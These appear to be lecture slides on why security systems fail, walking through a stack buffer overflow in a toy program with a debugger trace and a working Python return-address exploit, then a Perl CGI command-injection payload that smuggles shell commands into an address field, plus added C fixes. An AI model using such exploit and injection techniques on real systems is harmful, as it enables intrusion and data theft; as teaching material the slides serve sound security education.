Busted !. Why Security Systems Fail Capability List.

Busted !

Why Security Systems Fail

Capability List

Access Control List

Two adjacent buffers, name[9] and degree[4], filled with strcpy():

    strcpy(name, "charles");
    strcpy(degree, "PhD");

    name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 's'  0   0
    degree[4]:  'P' 'h' 'D'  0

    printf(name); printf(degree);      ->  charles PhD

Now with a name one character too long for the array (9 characters plus the terminating 0 is 10 bytes):

    strcpy(name, "charleton");

    name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'
    degree[4]:   0   …                              (the terminating 0 lands in degree[0])

    strcpy(degree, "PhD");

    name[9]:    'c' 'h' 'a' 'r' 'l' 'e' 't' 'o' 'n'   (no terminating 0 left inside name)
    degree[4]:  'P' 'h' 'D'  0

    printf(name); printf(degree);      ->  charletonPhD PhD

printf(name) keeps reading until it meets a 0, which is now the one at the end of degree.

The program poof used in the walk-through:

    #include <stdio.h>

    void secret1(void)
    {
        puts("You found the secret function No. 1!\n");
    }

    int main()
    {
        char string[2];              /* two bytes of buffer ... */
        puts("Input: ");
        scanf("%s", string);         /* ... and a read with no length limit */
        printf("You entered %s.\n", string);
        return 0;
    }

Walk-through of poof in the debugger. Every slide shows the same disassembly of main():

    0x100000e52:  push   %rbp               /* entry to main() */
    0x100000e53:  mov    %rsp,%rbp
    0x100000e56:  sub    $0x10,%rsp
    0x100000e5a:  lea    0x75(%rip),%rdi
    0x100000e61:  callq  0x100000ea4        /* puts() */
    0x100000e66:  lea    -0x10(%rbp),%rsi
    0x100000e6a:  lea    0x6d(%rip),%rdi
    0x100000e71:  mov    $0x0,%eax
    0x100000e76:  callq  0x100000eaa        /* scanf() */
    0x100000e7b:  lea    -0x10(%rbp),%rsi
    0x100000e7f:  lea    0x5b(%rip),%rdi
    0x100000e86:  mov    $0x0,%eax
    0x100000e8b:  callq  0x100000e9e        /* printf() */
    0x100000e90:  mov    $0x0,%eax
    0x100000e95:  leaveq
    0x100000e96:  retq

At startup of poof (the slide animates the first two instructions in several frames):

    rip 0x100000e52   rbp 0x7fff5fbff828   rsp 0x7fff5fbff818
    0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
    0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
    0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

    rip 0x100000e53   rbp 0x7fff5fbff828   rsp 0x7fff5fbff818
    0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00   (push %rbp saved the old rbp; other lines unchanged)

    rip 0x100000e53   rbp 0x7fff5fbff828   rsp 0x7fff5fbff828   (stack unchanged)

    rip 0x100000e53   rbp 0x7fff5fbff828   rsp 0x7fff5fbff818   (stack unchanged)

Before call to puts():

    rip 0x100000e61   rbp 0x7fff5fbff810   rsp 0x7fff5fbff800
    0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00
    0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
    0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just inside of puts() (one instruction in):

    rip 0x100000ea4   rbp 0x7fff5fbff810   rsp 0x7fff5fbff7f8
    0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00   (return address 0x100000e66 pushed by callq; other lines unchanged)

Just after return from puts():

    rip 0x100000e66   rbp 0x7fff5fbff810   rsp 0x7fff5fbff800   (stack unchanged)

Just inside scanf() (one instruction in):

    rip 0x100000e66   rsi 0x7fff5fbff800   rbp 0x7fff5fbff810   rsp 0x7fff5fbff7f8
    0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00   (return address 0x100000e7b; rsi points at string[], other lines unchanged)

After return from scanf():

    rip 0x100000e7b   rbp 0x7fff5fbff810   rsp 0x7fff5fbff800
    0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00
    0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41   (string[] starts here: 24 bytes of 'A' ...)
    0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
    0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41   (... over the saved rbp ...)
    0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00   (... and main()'s return address is now 0x100000e40)
    0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
    0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

Just before stack cleanup:

    rip 0x100000e95   rbp 0x7fff5fbff810   rsp 0x7fff5fbff800   (stack unchanged)

And ready to return to the operating system?

    rip 0x100000e96   rbp 0x(value missing on the slide)   rsp 0x7fff5fbff818   (stack unchanged)
    ?

retq pops 0x100000e40 into rip, which is secret1():

    0x100000e40:  push   %rbp
    0x100000e41:  mov    %rsp,%rbp
    0x100000e44:  lea    0x65(%rip),%rdi     # 0x100000eb0
    0x100000e4b:  callq  0x100000ea4
    0x100000e50:  leaveq
    0x100000e51:  retq

    rip 0x100000e40   rbp 0x(value missing on the slide)   rsp 0x7fff5fbff818   (stack unchanged)
    ? Hello secret1( ) !!!

    $ poof
    Input: A
    You entered A.
    $ cat poop
    import struct
    rip = 0x100000e40
    print("A"*24 + struct.pack("<q", rip))
    $ python poop | poof
    Input:
    You entered
    You found the secret function No. 1!
    Segmentation fault
    $
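The two unchecked calls behind both failures above (strcpy() into name[9]/degree[4], and scanf("%s") into poof's char string[2]) replaced by length-checked versions. This is an added example, not code from the slides; the struct and function names are mine, and the sizes match the slides.

```c
/* Added example (not from the slides): the name[9]/degree[4] layout and
 * poof's "read a string" step, with strcpy() and scanf("%s") replaced by
 * checked versions that reject a long input instead of overrunning the
 * neighbouring buffer or the saved return address. */
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

struct record {
    char name[9];     /* "charles" fits, "charleton" does not */
    char degree[4];
};

/* Copy src into dst[dst_size], refusing (not silently truncating) anything
 * that does not fit together with its terminating NUL. Returns 0 on success,
 * -1 on rejection; dst is left untouched when rejecting. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(src, '\0', dst_size);  /* NUL within dst_size bytes? */
    if (end == NULL)
        return -1;                                  /* too long: no room for the NUL */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Fill both fields with bounds checks, so a long name can never spill into
 * degree the way strcpy(name, "charleton") does on the slide. */
int set_record(struct record *r, const char *name, const char *degree)
{
    if (bounded_copy(r->name, sizeof r->name, name) != 0)
        return -1;
    return bounded_copy(r->degree, sizeof r->degree, degree);
}

/* Replacement for scanf("%s", string): read one line into buf[size], strip
 * the newline, and report an overlong line instead of writing past the end.
 * Returns the line length, or -1 on EOF or when the line did not fit (the
 * rest of that line is discarded so the next read starts on a fresh line). */
int read_line(char *buf, size_t size, FILE *in)
{
    if (fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return (int)len - 1;
    }
    int c = getc(in);                 /* no newline seen: did the line end exactly here? */
    if (c == EOF || c == '\n')
        return (int)len;
    while (c != '\n' && c != EOF)     /* too long: drain the leftover bytes */
        c = getc(in);
    buf[0] = '\0';
    return -1;
}

/* Feed a constructed input line through read_line() via an in-memory stream. */
int read_line_from_string(const char *input, char *buf, size_t size)
{
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -1;
    int n = read_line(buf, size, f);
    fclose(f);
    return n;
}

int main(void)
{
    struct record r = { "", "" };
    printf("charles/PhD:   %s\n", set_record(&r, "charles", "PhD") == 0 ? "ok" : "rejected");
    printf("charleton/PhD: %s\n", set_record(&r, "charleton", "PhD") == 0 ? "ok" : "rejected");
    char line[16];   /* poof's 24 'A's plus an address would have run past this too */
    int n = read_line_from_string("AAAAAAAAAAAAAAAAAAAAAAAA\n", line, sizeof line);
    printf("24 'A's into %zu bytes: %s\n", sizeof line, n < 0 ? "rejected" : "ok");
    return 0;
}
```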

    #!/usr/bin/perl
    # funky CGI script example
    $dest = "foo1";                     # pretend this is the destination address from the user
    open (MAIL,"| /bin/cat >$dest ");   # pretend this was a call to sendmail
    print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
    close MAIL;

The same script when $dest arrives from the user with more than an address in it:

    #!/usr/bin/perl
    # funky CGI script example
    $dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
    open (MAIL,"| /bin/cat >$dest ");   # pretend this was a call to sendmail
    print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
    close MAIL;

    #!/usr/bin/perl -w
    # (1) quit unless we have the correct number of command-line args
    $num_args = $#ARGV + 1;
    if ($num_args != 2) {
        print "\nUsage: name.pl -address brief-message\n";
        exit;
    }
    # (2) we got two command line args, so assume it's address
    $dest=$ARGV[0];
    $content=$ARGV[1];
    my $sendmail = "/usr/sbin/sendmail -t";
    #open (MAIL,"| /bin/cat >$dest ");   # pretend this was a call to sendmail
    open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";
    print MAIL "To: $dest\n";
    print MAIL "From: me\n";
    print MAIL "Subject: test\n";
    print MAIL "Content-type: text/plain\n\n";
    print MAIL $content;
    close MAIL;

Run it with:

    ./tryit.pl ccpalmer "Some long message here inside quotes"

Could you find a way to trick the perl script into mailing you some file that it shouldn't???
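The defensive side of the CGI scripts above, written as an added example in C rather than Perl (not the lecturer's code): the Perl pipe open and C's popen() both hand the command string to /bin/sh, so the fix is to validate the address against an allow-list and to start sendmail with execv() and a fixed argv, with no shell in between. The function names are mine; /bin/cat stands in for sendmail exactly as on the slide.

```c
/* Added example (not from the slides): the CGI script's flaw, rebuilt in C.
 * open(MAIL, "| /bin/cat >$dest") hands $dest to /bin/sh, which is why
 * "foo1; echo 'this could be bad!';find . -name '*.c' -print;" runs extra
 * commands; popen() would behave the same. The fix below checks the
 * address against an allow-list and starts sendmail with execv() and a
 * fixed argv, so no shell ever parses user input. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Accept only characters that can appear in a plain mailbox address.
 * Everything a shell cares about (; | & < > ` $ ' " space ...) is absent
 * from the list, and a leading '-' is refused because sendmail would read
 * it as an option. Returns 1 if acceptable, 0 otherwise. */
int valid_address(const char *addr)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-+@";
    size_t len = strlen(addr);
    if (len == 0 || len > 254 || addr[0] == '-')
        return 0;
    return strspn(addr, allowed) == len;   /* every byte is in the allow-list */
}

/* Run sendmail -t with the message on its stdin, via fork()/execv().
 * dest appears only in the To: header of the data stream, never in a
 * command line. Returns the child's exit status, or -1 if the address is
 * rejected or the process could not be started. */
int send_mail(const char *sendmail_path, const char *dest, const char *content)
{
    if (!valid_address(dest))
        return -1;
    int pipefd[2];
    if (pipe(pipefd) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                       /* child: stdin <- pipe, then exec */
        dup2(pipefd[0], STDIN_FILENO);
        close(pipefd[0]);
        close(pipefd[1]);
        char *const argv[] = { (char *)sendmail_path, "-t", NULL };
        execv(sendmail_path, argv);       /* argv array: no shell involved */
        _exit(127);
    }
    close(pipefd[0]);                     /* parent: write the message */
    FILE *mail = fdopen(pipefd[1], "w");
    if (mail == NULL)
        return -1;
    fprintf(mail, "To: %s\nFrom: me\nSubject: test\nContent-type: text/plain\n\n%s\n",
            dest, content);
    fclose(mail);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "Usage: tryit address brief-message\n");
        return 1;
    }
    /* /bin/cat stands in for /usr/sbin/sendmail, as on the slide. */
    int rc = send_mail("/bin/cat", argv[1], argv[2]);
    if (rc != 0)
        fprintf(stderr, "not sent (address rejected or sendmail failed)\n");
    return rc == 0 ? 0 : 1;
}
```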